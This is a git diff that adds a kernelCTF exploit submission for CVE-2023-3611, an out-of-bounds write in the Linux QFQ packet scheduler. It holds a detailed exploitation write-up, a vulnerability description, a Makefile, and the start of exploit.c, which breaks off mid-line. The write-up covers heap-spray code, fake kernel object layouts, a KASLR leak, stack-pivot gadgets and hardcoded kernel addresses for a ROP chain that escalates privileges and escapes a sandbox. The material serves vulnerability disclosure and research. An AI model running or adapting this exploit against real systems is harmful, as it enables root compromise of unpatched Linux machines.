+hopefully freed when destroying the class that possesses it.
+This way we can have a UaF in the `kmalloc-128` slab.
+A suitable fake `qfq_aggregate` needs to allow full control of the relevant members
+(`lmax`, `class_weight`, `num_classes`).
+In order to smuggle the fake object, we will flip a bit of the `nonfull_aggs` list
+member to hopefully point to our controlled object:
+```
+
++-qfq qdisc----+
+| ...          |
+| filter_list  |
+| ...          |        +-fake object---+
+| bitmaps[]    |        |               |
+| groups[]     |        |               |
+| ...          |        +---------------+
+| nonfull_aggs | -------x-------------+
++--------------+        x             |
+                        x      +-----> 0200 +-qfq_aggregate-+
++-controlled o-+        x flip |            |               |
+| ...          |        x a bit|            |               |
+| fake grp {}  |        x      |            +---------------+
+|              |        x
+| ...          |        x-------------------> 0280 +-fake object---+
+| ...          |                                   |               |
+|              |                                   |               |
++--------------+                                   +---------------+
+```
+
+By targeting a bit of the `nonfull_aggs` member of the qdisc object we will
+potentially be able to inject a fake `struct qfq_aggregate` object into the
+qdisc.
+
+#### Step 1.1: QFQ Internal State Control
+
+Looking at the code in `qfq_change_class()` we can see that `qfq_add_to_agg()`
+is called with the new `agg` after triggering the vulnerability:
+
+```c
+// net/sched/sch_qfq.c
+
+/* Add class to aggregate. */
+static void qfq_add_to_agg(struct qfq_sched *q,
+			   struct qfq_aggregate *agg,
+			   struct qfq_class *cl)
+{
+	cl->agg = agg;
+
+	qfq_update_agg(q, agg, agg->num_classes+1); // [1]
+	if (cl->qdisc->q.qlen > 0) { /* adding an active class */
+		list_add_tail(&cl->alist, &agg->active);
+		if (list_first_entry(&agg->active, struct qfq_class, alist) ==
+		    cl && q->in_serv_agg != agg) /* agg was inactive */
+			qfq_activate_agg(q, agg, enqueue); /* schedule agg */ // [2]
+	}
+}
+```
+
+After the out-of-bounds group is stored into the aggregate in [1] we can
+hit `qfq_activate_agg()` [2].
+
+```c
+/* Update agg ts and schedule agg for service */
+static void qfq_activate_agg(struct qfq_sched *q, struct qfq_aggregate *agg,
+			     enum update_reason reason)
+{
+	agg->initial_budget = agg->budget = agg->budgetmax; /* recharge budg. */
+
+	qfq_update_agg_ts(q, agg, reason);
+	if (q->in_serv_agg == NULL) { /* no aggr. in service or scheduled */
+		q->in_serv_agg = agg; /* start serving this aggregate */
+		/* update V: to be in service, agg must be eligible */
+		q->oldV = q->V = agg->S;
+	} else if (agg != q->in_serv_agg)
+		qfq_schedule_agg(q, agg); // [3]
+}
+```
+
+After passing the checks in `qfq_activate_agg()` we will call the desired
+`qfq_schedule_agg()` [3].
+
+In order to hit these code paths we need to fulfill certain constraints:
+1. `q->in_serv_agg != NULL` and `q->in_serv_agg != new_oob_agg`
+2. the (sub) qdisc of the owning class of the aggregate needs to be non-empty (`cl->qdisc->q.qlen > 0`)
+
+We can control `q->in_serv_agg` by enqueuing packets:
+```c
+static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+		       struct sk_buff **to_free)
+{
+// ...
+	qfq_activate_agg(q, agg, enqueue);
+// ...
+}
+```
+Initially `q->in_serv_agg` will be `NULL`, thus we will hit the second branch
+in `qfq_activate_agg()` (see above).
+
+The problem is that, right after enqueuing the packet, the dequeue operation
+will reset the state (unless we generate enormous amounts of traffic so that
+the scheduling actually kicks in, which however still leaves us with a race).
+In order to work around that problem we will modify the sub qdisc of the class
+to be a `netem` qdisc, which allows us to add a generously chosen delay, so that
+the dequeue operation fails because no packet is available yet.
+This will issue a warning in `qfq_peek_skb()`, but that will not be a problem for us.
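+
+The traffic-control setup just described would look roughly like this with the
+`tc` CLI (device, handles and the concrete delay/limit values are illustrative;
+the exploit itself performs the equivalent netlink operations directly):
+
+```c
+#include <stdlib.h>
+
+void setup_qdiscs(void) {
+    // QFQ root qdisc with one class ...
+    system("tc qdisc add dev lo root handle 1: qfq");
+    system("tc class add dev lo parent 1: classid 1:1 qfq weight 1 maxpkt 2048");
+    // ... and a netem child: a large delay keeps packets queued (dequeue
+    // finds nothing yet), a small limit drops the packets after the trigger.
+    system("tc qdisc add dev lo parent 1:1 handle 2: netem delay 10s limit 5");
+}
+```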
+
+This solves constraint number one. As a bonus this naturally solves constraint
+number two because the underlying netem qdisc has in fact packets queued;
+they are just delayed.
+
+We need to send packets to the qdisc to trigger the vulnerability anyway, so
+we can combine those goals.
+After corrupting an aggregate using the vulnerability, the qdisc is in a very unstable
+state, so we have to make sure that the packet that triggers the vulnerability is dropped
+(and the ones after, too).
+This will prevent further calls to `qfq_activate_agg()` and a lot of code paths in
+`qfq_dequeue()` which are likely to make the kernel panic with the fake group in place.
+In order to achieve that we will set the limit for the configured `netem` qdisc
+accordingly, dropping packets after the limit is reached.
+
+Finally, also note that we set up the size table in such a way that it performs a table lookup
+to get the resulting packet size. This way we can choose our packets accordingly
+in order to trigger the vulnerability only when we want to.
+
+### Step 2: Heap Spray
+
+#### Step 2.1: QFQ Qdiscs and `kmalloc-8192`
+
+To successfully make use of the vulnerability we need a controllable object in
+the `kmalloc-8192` cache.
+
+The qdisc is allocated by `qdisc_alloc()`:
+```c
+// qdisc_alloc() in net/sched/sch_generic.c
+	struct Qdisc *sch;
+
+// ..
+
+	dev = dev_queue->dev;
+	sch = kzalloc_node(size, GFP_KERNEL, netdev_queue_numa_node_read(dev_queue));
+```
+
+Thus we need an object which is allocated using `GFP_KERNEL` as well.
+Though the choice might be questionable in hindsight, I chose the well known
+`struct user_key_payload` for this purpose, as this structure can be allocated
+with variable sizes, anywhere from 24 up to 32767 + 24 bytes.
+One downside of the key structure is the fact that we can only allocate a few
+of them because our quota is (by default) limited to 20000 bytes.
+Besides that we can easily control a `qfq_group` object at our desired offset
+according to the `lmax` we set when triggering the vulnerability:
+```c
+struct qfq_group {
+	u64 S, F;			/* group timestamps (approx). */
+	unsigned int slot_shift;	/* Slot shift. */
+	unsigned int index;		/* Group index. */
+	unsigned int front;		/* Index of the front slot. */
+	unsigned long full_slots;	/* non-empty slots */
+
+	/* Array of RR lists of active aggregates. */
+	struct hlist_head slots[QFQ_MAX_SLOTS];
+};
+```
+
+Because of the restrictions we can only spray 3-4 fake objects, which greatly
+reduces the chances of hitting the correct object when triggering the vulnerability.
+
+We will spray several qdiscs to groom the heap.
+After that we will spray a few key payloads and hope that one of them lands right after
+the last qdisc we sprayed.
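+
+A minimal sketch of such a key-based spray (raw `add_key` syscall; the ~8 KiB
+payload size is chosen so that the `user_key_payload` allocation, data plus its
+24-byte header, lands in `kmalloc-8192`):
+
+```c
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <linux/keyctl.h>
+
+// Returns the key serial, or -1 on error. Only a handful of these fit into
+// the default 20000-byte quota.
+static long spray_key(int id, const void *payload, size_t len /* ~8000 */) {
+    char desc[32];
+    snprintf(desc, sizeof(desc), "spray_%d", id);
+    return syscall(SYS_add_key, "user", desc, payload, len,
+                   KEY_SPEC_PROCESS_KEYRING);
+}
+```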
+The enqueue operation is naturally prone to kernel panics, especially
+when the fake object contains only zeros, which is fairly likely in the
+rarely used `kmalloc-8192`.
+
+There are several strategies to make it more stable, but we are happy with the
+roughly 25% success rate of the naive approach.
+
+In order to spray qdiscs we will create child processes, each with a new
+network namespace to easily generate loopback devices to attach qdiscs to.
+The only real requirement of the payload is to have the correct `grp->index`
+set. Additionally, keeping all other fields zero ensures that adding nodes to the
+`grp->slots[]` lists does not cause any trouble.
+
+An advantage of using `struct user_key_payload` is the fact that we know when the heap
+spray succeeded because `qfq_slot_insert()` will add the aggregate pointer into the
+`slots` array of the group we control:
+
+```c
+static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg,
+			    u64 roundedS)
+{
+
+// ..
+
+	hlist_add_head(&agg->next, &grp->slots[i]);
+	__set_bit(slot, &grp->full_slots);
+}
+```
+
+With the key control we can then read the key back and check if we got a kernel
+heap pointer.
+As a bonus, we can check if the pointer has the relevant bit that we want to flip
+unset, so that we know whether the bit flip succeeded.
+If it failed and we got that far, we can easily retry.
+
+
+#### Step 2.2: qfq_aggregate and `kmalloc-128`
+
+Since we already utilized `struct user_key_payload`, we will do so again.
+The payloads are much smaller now, too, so we do not have to worry about quota restrictions.
+
+Looking at `struct qfq_aggregate` we can see that all the relevant fields can
+be controlled with a small key payload:
+```c
+struct qfq_aggregate {
+	struct hlist_node next;		/*     0    16 */
+	u64 S;				/*    16     8 */
+
+	// start of user controllable data:
+	u64 F;				/*    24     8 */
+	struct qfq_group * grp;		/*    32     8 */
+	u32 class_weight;		/*    40     4 */
+	int lmax;			/*    44     4 */
+	u32 inv_w;			/*    48     4 */
+	u32 budgetmax;			/*    52     4 */
+	u32 initial_budget;		/*    56     4 */
+	u32 budget;			/*    60     4 */
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	int num_classes;		/*    64     4 */
+
+	u8 __pad0[4];			/* XXX 4 bytes hole, try to pack */
+
+	struct list_head active;	/*    72    16 */
+	struct hlist_node nonfull_next;	/*    88    16 */
+
+	/* size: 104, cachelines: 2, members: 13 */
+	/* sum members: 100, holes: 1, sum holes: 4 */
+	/* last cacheline: 40 bytes */
+}
+```
+By choosing a unique `lmax` for this aggregate we can identify it later.
+Keeping the list heads `NULL` will be fine, since they will be initialized
+by the kernel code if they are not yet.
+Leaving `grp` equal to `NULL` will make the kernel code overwrite it with a
+pointer into the `q` as well (see `qfq_update_agg()`).
+We will choose `num_classes` to be equal to 0 so that deletion of the
+to-be-owning class will cause the fake aggregate to be freed.
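+
+Since the key data starts right after the 24-byte `user_key_payload` header,
+the sprayed bytes overlay `qfq_aggregate` exactly from `F` onwards, which is
+what the "start of user controllable data" marker above reflects. A sketch of
+the resulting 80-byte payload, with the field choices just described:
+
+```c
+#include <stdint.h>
+
+struct fake_agg_payload {      /* overlays qfq_aggregate from offset 24 */
+    uint64_t F;                /* don't care */
+    uint64_t grp;              /* NULL: qfq_update_agg() re-points it into q */
+    uint32_t class_weight;     /* matched by qfq_find_agg() */
+    int32_t  lmax;             /* unique value, doubles as an identifier */
+    uint32_t inv_w, budgetmax, initial_budget, budget;
+    int32_t  num_classes;      /* 0: deleting the owning class frees the agg */
+    uint8_t  pad[4];
+    uint64_t active[2];        /* list_head, left NULL */
+    uint64_t nonfull_next[2];  /* hlist_node, left NULL */
+};
+```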
+
+This will achieve a couple of things:
+- We can craft a fake aggregate without needing any knowledge of kernel pointers
+  (even though we would know the pointer of the aggregate we are faking).
+- We have a unique identifier to make sure that the spray was successful before
+  destabilizing the kernel.
+- When reading back the corrupted key payload, we have another leak to kernel heap
+  memory. Specifically the `kmalloc-8192` cache this time. This allows us to
+  precisely locate our initial key buffer, too.
+
+We will spray a few fake aggregates before triggering the vulnerability
+and a few after the trigger. This way we hopefully increase our chances to
+win the bit flip.
+
+
+### Step 3: Trigger Use-after-Free
+
+To recap, at this point we have the following:
+- A QFQ qdisc in `kmalloc-8192`, right behind it a user controlled buffer
+  - we know the pointers of both of them
+- A `qfq_class` with a fake `qfq_aggregate` which is actually a `user_key_payload` we control
+  - we know the pointer of this buffer as well
+
+We can now free the aggregate by deleting the class we attached it to.
+
+Looking for objects which can be used to reclaim the freed aggregate I found
+the `struct tcf_proto` (in `include/net/sch_generic.h`):
+```c
+struct tcf_proto {
+	void*	next;			/*     0     8 */
+	void *	root;			/*     8     8 */
+	int	(*classify)(struct sk_buff *, const struct tcf_proto *, struct tcf_result *);	/*    16     8 */
+
+	// start of user controllable data
+	u16	protocol;		/*    24     2 */
+
+	/* XXX 2 bytes hole, try to pack */
+	u8	__pad0[2];
+
+	u32	prio;			/*    28     4 */
+	void *	data;			/*    32     8 */
+	const struct tcf_proto_ops * ops;	/*    40     8 */
+	struct tcf_chain * chain;	/*    48     8 */
+	u32	lock;			/*    56     4 */
+	u8	deleting;		/*    60     1 */
+
+	/* XXX 3 bytes hole, try to pack */
+	u8	__pad1[3];
+
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	u32	refcnt;			/*    64     4 */
+
+	/* XXX 4 bytes hole, try to pack */
+	u8	__pad2[4];
+
+	u8	rcu[16];
+	struct hlist_node destroy_ht_node;	/*    88    16 */
+
+	/* size: 104, cachelines: 2, members: 13 */
+	/* sum members: 95, holes: 3, sum holes: 9 */
+	/* forced alignments: 1, forced holes: 1, sum forced holes: 4 */
+	/* last cacheline: 40 bytes */
+};
+```
+
+By reclaiming the freed `struct qfq_aggregate` with this object, we will be able
+to leak a pointer which allows us to bypass KASLR (`*ops`).
+Additionally we can later overwrite the `ops` to gain RIP control.
+This structure is particularly well suited for this, as you will see later.
+
+Leaking the structure contents turns out to be non-trivial.
+The `classify` member of the `struct tcf_proto` (a shortcut to `ops->classify`)
+will overlap with the size field of `struct user_key_payload` at offset 16.
+This size field is a `u16`, thus it takes the lowest two bytes of the `classify` function pointer.
+The problem is that `keyctl_read_key` in `security/keys/keyctl.c` will either read
+the whole key or no key at all.
+This means we have to survive a kernel heap read up to the size specified by the kernel
+pointer.
+Especially with the guard pages present, this will likely fail.
+In order to circumvent this problem we will choose a classifier with a "low" address.
+Specifically we choose `rsvp` because it has the lowest available:
+```
+$ cat kallsyms | grep -Ew "basic_classify|cls_bpf_classify|cls_cgroup_classify|fw_classify|route4_classify|u32_classify|rsvp_classify"
+ffffffff89cdba10 t u32_classify
+ffffffff89cdef10 t route4_classify
+ffffffff89cdf300 t fw_classify
+ffffffff89ce1710 t rsvp_classify
+ffffffff89ce27d0 t basic_classify
+ffffffff89ce3320 t cls_cgroup_classify
+ffffffff89ce3c30 t cls_bpf_classify
+```
+
+This means we only have to copy `0x1710` bytes, which works well in practice.
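+
+A sketch of the read-back (raw `keyctl` syscall; the `ops` offset comes from
+the pahole dump above, and turning the leaked pointer into the kernel base by
+subtracting the build-specific `rsvp` ops offset is left as a comment):
+
+```c
+#include <stdint.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <linux/keyctl.h>
+
+static uint64_t leak_tcf_proto_ops(int32_t key) {
+    // datalen now equals the low 16 bits of rsvp_classify, i.e. 0x1710.
+    static uint8_t buf[0x1710];
+    if (syscall(SYS_keyctl, KEYCTL_READ, key, buf, sizeof(buf)) < 0)
+        return 0;
+    // Key data starts at struct offset 24 and ops sits at offset 40,
+    // so the ops pointer appears at offset 16 of the leaked data.
+    return *(uint64_t *)(buf + 16);  // kbase = ops - <build-specific offset>
+}
+```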
+### Step 4: Getting RIP Control
+
+By overwriting the `ops` member of the aforementioned `struct tcf_proto` we are
+well on our way to gaining arbitrary kernel code execution.
+
+Looking through references to the available function pointers, I chose the path
+through `tc_get_tfilter()`:
+
+```c
+static int tc_get_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+                          struct netlink_ext_ack *extack) {
+        struct tcf_proto *tp = NULL;
+
+// ...
+
+        tp = tcf_chain_tp_find(chain, &chain_info, protocol,
+                               prio, false); // [1]
+
+// ...
+
+        fh = tp->ops->get(tp, t->tcm_handle); // [2]
+
+        if (!fh) {
+                NL_SET_ERR_MSG(extack, "Specified filter handle not found");
+                err = -ENOENT;
+        } else {
+                err = tfilter_notify(net, skb, n, tp, block, q, parent,
+                                     fh, RTM_NEWTFILTER, true, rtnl_held); // [3]
+                if (err < 0)
+                        NL_SET_ERR_MSG(extack, "Failed to send filter notify message");
+        }
+
+// ...
+
+}
+
+static int tcf_fill_node(struct net *net, struct sk_buff *skb,
+                         struct tcf_proto *tp, struct tcf_block *block,
+                         struct Qdisc *q, u32 parent, void *fh,
+                         u32 portid, u32 seq, u16 flags, int event,
+                         bool terse_dump, bool rtnl_held)
+{
+
+// ...
+
+        // [4]
+        if (tp->ops->dump &&
+            tp->ops->dump(net, tp, fh, skb, tcm, rtnl_held) < 0)
+                goto nla_put_failure;
+
+// ...
+}
+```
+
+First the structure is retrieved [1]; we will have a closer look at this later.
+After that, the `ops->get()` function is invoked [2], with `rdi` pointing to the
+fake `tcf_proto` itself and `rsi` holding a handle we specified.
+
+I could not find a proper stack pivoting gadget which would jump to memory
+controlled by `rdi`, so we will pursue a different idea:
+we will set `ops->get` to point to a gadget which simply returns `rdi`.
+This way `fh` is non-`NULL`, so we eventually reach `tcf_fill_node()` through
+`tfilter_notify()` [3].
+In `tcf_fill_node()`, `ops->dump()` [4] is invoked, now with more control over
+the parameters. Even though we have useful pointers available in both `rsi`
+and `rdx`, the following stack pivot will only use `rsi`.
+
+We will set `ops->dump()` to the following gadget:
+```nasm
+push rsi;
+jmp [rsi + 0x39]
+```
+
+With this gadget we can perform a stack pivot into our fake `struct tcf_proto`.
+Since this object is quite small (and some fields are constrained), we will
+pivot the stack again.
+Naturally, a good target is the large buffer in `kmalloc-8192`, because we
+already know its address and we have plenty of space there.
+Note that we cannot modify the key payload, so we have to free it and repeat
+the spray.
+Also note that the `ops` member introduces one level of pointer indirection,
+but we will use the large buffer for that, too.
+
+In order to do the first pivot, we choose the following gadget chain:
+```nasm
+pop rsp;
+add rsp, 0x18;
+pop rbx;
+pop rbp;
+pop r12;
+ret;
+```
+This chain is specifically chosen to overlay the `struct tcf_proto` in such a
+way that it does not touch any vital members.
+
+We can control `rbp` with this chain, so we use the following gadget to pivot
+to the prepared stack in the large buffer:
+```nasm
+mov rsp, rbp;
+pop rbp;
+ret
+```
+
+After that we are on a large stack without any constraints, so assembling a
+standard ROP payload which escalates privileges and escapes the sandbox is
+trivial.
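+Condensed, the wiring of the two entry points looks like this (taken from
+`prep_final_large_payload()` in `exploit.c` further down; `large` is the
+kmalloc-8192 key payload whose address we leaked earlier):
+
+```c
+// The fake tcf_proto->ops points into the big key, at &large->rop.ops.
+strcpy(large->rop.ops.kind, "exploit");                // matched against TCA_KIND
+large->rop.ops.get  = (void *)mov_rax_rdi_jmp_zen_ret; // [2]: returns tp as fh
+large->rop.ops.dump = (void *)push_rsi_jmp_rsi_0x39;   // [4]: the pivot entry
+```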
+#### Step 4.1: Stabilizing the Trigger
+
+As mentioned earlier, `struct tcf_proto` is a very good choice as an
+overwrite target.
+Looking at the way the fake structure is retrieved, we can see that we can
+make use of the error conditions to make the trigger completely stable.
+
+```c
+// in tc_get_tfilter()
+        if (!tp || IS_ERR(tp)) {
+                NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
+                err = tp ? PTR_ERR(tp) : -ENOENT; // [1]
+                goto errout;
+        } else if (tca[TCA_KIND] && nla_strcmp(tca[TCA_KIND], tp->ops->kind)) {
+                NL_SET_ERR_MSG(extack, "Specified filter kind does not match existing one");
+                err = -EINVAL; // [2]
+                goto errout;
+        }
+```
+
+By choosing a unique protocol and priority for the fake `tcf_proto` we can
+prevent wrong structures from being found.
+If the kernel cannot find the requested protocol / priority combination, it
+returns `-ENOENT` [1]. By catching this error we know whether the initial
+spray of the fake `tcf_proto` succeeded.
+If it did not, we can simply retry.
+
+When the kernel finds the fake `tcf_proto`, it compares `tp->ops->kind` to
+the requested kind. By choosing a unique kind here as well, we will be able
+to tell whether the spray of the large objects succeeded, because we observe
+the error `-EINVAL` [2] if it did not.
+No controlled code is executed before these checks pass.
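+In pseudo-C the resulting retry loop looks like this (mirroring
+`final_stage_worker()` in `exploit.c`; `trigger_tfilter_get()` and the
+`respray_*()` helpers are hypothetical wrappers around the `RTM_GETTFILTER`
+request and the two sprays):
+
+```c
+for (;;) {
+    int err = trigger_tfilter_get(s);  // netlink error code, 0 on success
+    if (err == -ENOENT) { respray_tcf_proto();     continue; } // [1] hit
+    if (err == -EINVAL) { respray_large_payload(); continue; } // [2] hit
+    break; // both sprays landed: ops->get()/ops->dump() run our chain
+}
+```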
+## General Notes on the Exploit
+
+The exploit makes heavy use of multiprocessing in order to simplify the use
+of network namespaces (we use one network namespace for each QFQ qdisc we
+create).
+
+The main function of the exploit coordinates the child processes.
+The children notify the parent through a simple wait-based event system.
+For the first 3 steps, a process is repeatedly cloned into `bug_worker()` until
+we identify one worker which actually triggers the vulnerability (still
+inside that worker).
+Finally, the spraying of `struct tcf_proto` and the eventual triggering of RIP
+control are done by another worker process, `final_stage_worker()`.
+
+There is one additional worker process which handles everything related to
+the sprayed keys. We need this process because keys are generally scoped by
+permissions. To avoid having to deal with that, we have one dedicated process
+which owns all the keys and just acts on demand.
+
+Finally, note that the exploit does not make use of any netlink library or the
+like. Therefore, you may notice that the code related to netlink is quite
+verbose.
+
+### Stability
+
+The main problem is the initial heap spray, where we try to land a large key
+payload right after the victim qdisc.
+Because we only have 3 key payloads available, we are unlikely to hit this
+layout on any single attempt.
+Depending on the instance, the success rate was about 30-50%.
+I later discovered that this step could be made much more stable by using
+different CPUs for the main orchestration and the workers.
+Additionally, using another object to perform the `kmalloc-8192` spray may be
+beneficial, because the limited key quota greatly decreases the chances of
+hitting a "good" layout. One such object would be `struct qdisc_size_table`,
+as briefly described in the related mitigation exploits.
+
+The last steps are quite stable and work almost all of the time.
+
+Finally, one should note that the exploit does not perform proper
+post-exploitation cleanup.
+The vulnerable QFQ qdisc class is not properly cleaned up, so as soon as the
+timers for dequeue operations fire, the kernel will likely panic.
+
+
+# Mitigation
+
+The exploit for the mitigation instance largely follows that of CVE-2023-31436,
+so I will not go into too much detail on it.
+The main difference is the way we trigger the vulnerability.
+(The exploit for CVE-2023-31436 was obviously designed to work for both.)
+
+In summary, instead of the process described above, we directly corrupt the
+`filter_list` member of `qfq_sched`.
+We need a three-way layout for that to work (we are targeting the qdisc
+which lies after the controlled buffer).
+This causes a type confusion for the `struct tcf_proto` object, which we
+trivially expand into RIP control using `struct xdp_umem`.
+
+Triggering the vulnerability imposes additional constraints on the sprayed
+sizetables. Since the group object we want to control is far into the
+sizetable, this is no problem and can be set up similarly to the LTS version.
diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..bcfba71c
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md
@@ -0,0 +1,74 @@
+Vulnerability Details
+=====================
+
+CVE-2023-3611: An out-of-bounds write vulnerability in the Linux kernel's
+net/sched: sch_qfq component can be exploited to achieve local privilege
+escalation. The qfq_change_agg() function in net/sched/sch_qfq.c allows an
+out-of-bounds write because lmax is updated according to packet sizes without
+bounds checks.
+
+This vulnerability affects the packet scheduler subsystem, specifically QFQ+.
+
+An attacker can utilize this vulnerability to cause a slab-out-of-bounds
+read/write in the `kmalloc-8192` cache.
+
+## Requirements
+
+A user needs to be able to modify qdiscs, which requires `CAP_NET_ADMIN`.
+Naturally, this capability can be obtained through user namespaces, so
+`CONFIG_USER_NS` may be required as well.
+
+The specific qdisc in question is QFQ, which needs to be enabled via
+`CONFIG_NET_SCH_QFQ`.
+
+## History
+
+The fixing commit is https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64.
+It fixes 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost"),
+which dates back to 2012.
+Based on this I assume 3.0.x+ is affected.
+
+## Triggering the Vulnerability
+
+The issue is similar to CVE-2023-31436.
+
+Consider the following code in `net/sched/sch_qfq.c`:
+
+```c
+static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+                       struct sk_buff **to_free)
+{
+        unsigned int len = qdisc_pkt_len(skb), gso_segs;
+
+        // ...
+
+        if (unlikely(cl->agg->lmax < len)) {
+                pr_debug("qfq: increasing maxpkt from %u to %u for class %u",
+                         cl->agg->lmax, len, cl->common.classid);
+                err = qfq_change_agg(sch, cl, cl->agg->class_weight, len);
+                if (err) {
+                        cl->qstats.drops++;
+                        return qdisc_drop(skb, sch, to_free);
+                }
+
+        // ...
+
+        }
+```
+
+Here `lmax` is increased according to the packet length `len` without any
+bounds checks.
+Usually this would not pose a problem, because packet sizes are naturally
+limited.
+However, `len` is not the actual packet length but rather `qdisc_pkt_len(skb)`,
+which may apply size transformations according to a `struct qdisc_size_table`
+(created by `qdisc_get_stab()` in `net/sched/sch_api.c`) if the `TCA_STAB`
+option was set when modifying the qdisc.
+A user may choose virtually any size using such a table.
+
+`qfq_init_agg()` will then set `new_agg->lmax` accordingly.
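+For reference, the exploit in this PR uses a two-entry table with
+`cell_log = 9` and `size_log = 7`, which turns a 512-byte UDP packet into an
+arbitrary attacker-chosen size (sketch only, netlink plumbing omitted):
+
+```c
+#include <linux/pkt_sched.h>
+
+// qdisc_pkt_len(skb) becomes data[pkt_len >> cell_log] << size_log
+struct tc_sizespec spec = {
+    .cell_log = 9,
+    .size_log = 7,
+    .tsize    = 2,
+};
+unsigned short data[2] = { 0, 0x400000 >> 7 };
+// A 512-byte packet hits data[1]: 512 >> 9 == 1,
+// and (0x400000 >> 7) << 7 == 0x400000 == the new lmax.
+```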
+Eventually `qfq_add_to_agg()` will initialize `new_agg->grp` when the call tree reaches `qfq_update_agg()`: + +```c +// qfq_update_agg() in net/sched/sch_qfq.c + agg->budgetmax = new_num_classes * agg->lmax; + new_agg_weight = agg->class_weight * new_num_classes; + agg->inv_w = ONE_FP/new_agg_weight; + + if (agg->grp == NULL) { + int i = qfq_calc_index(agg->inv_w, agg->budgetmax, + q->min_slot_shift); + agg->grp = &q->groups[i]; + } +``` + +`qfq_calc_index()` performs some simple arithmetics to choose the final value, but will not do any additional bounds checks. Eventually this results in `agg->grp` pointing out-of-bounds relative to the `q` object of type `struct qfq_sched` (in the kmalloc-8192 cache). + +The group of the qfq_aggregate is used in several places, leading to OOB reads and writes. diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile new file mode 100644 index 00000000..a590ce1c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit new file mode 100755 index 00000000..5896d4f5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c new file mode 100644 index 00000000..02adc6cf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c @@ -0,0 +1,1646 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) 
printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { + +u64 cls_rsvp_ops = 0xffffffff8395e320; + +u64 find_task_by_vpid = 0xffffffff811b5670; +u64 switch_task_namespaces = 0xffffffff811bd1f0; +u64 commit_creds = 0xffffffff811bed80; +u64 prepare_kernel_cred = 0xffffffff811bf020; +u64 init_task = 0xffffffff83615a40; +u64 init_nsproxy = 0xffffffff836765c0; + +u64 ___trampoline_start_iretq = 0xffffffff822010c6; + +u64 mov_rdi_rax = 0xffffffff810eb083; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff810271ec; // 